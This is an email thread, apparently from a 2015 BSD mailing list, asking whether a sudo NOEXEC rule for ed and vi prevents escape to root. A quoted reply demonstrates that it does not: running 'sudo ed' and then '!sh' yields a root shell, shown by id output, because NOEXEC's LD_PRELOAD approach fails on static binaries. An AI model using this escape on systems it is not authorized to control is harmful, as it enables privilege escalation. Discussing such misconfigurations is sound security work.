"Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
static executables."

Thank you, so there is a way tricking noexec with vi to get a root shell.
But how exactly? Why isn't it fixed? :O

On Mon, Apr 27, 2015 at 9:49 PM, Christian Weisgerber <na...@mips.inka.de>
wrote:

> On 2015-04-27, "whynot sudo" <whynots...@safe-mail.net> wrote:
>
> > Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
> > foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
> >
> > Can the "foouser" escape to root prompt?
>
> Let's try!
>
> $ sudo ed
> !sh
> # id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
> 5(operator), 20(staff), 31(guest)
> #
>
> Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
> static executables.
>
> --
> Christian "naddy" Weisgerber                          na...@mips.inka.de

Reply via email to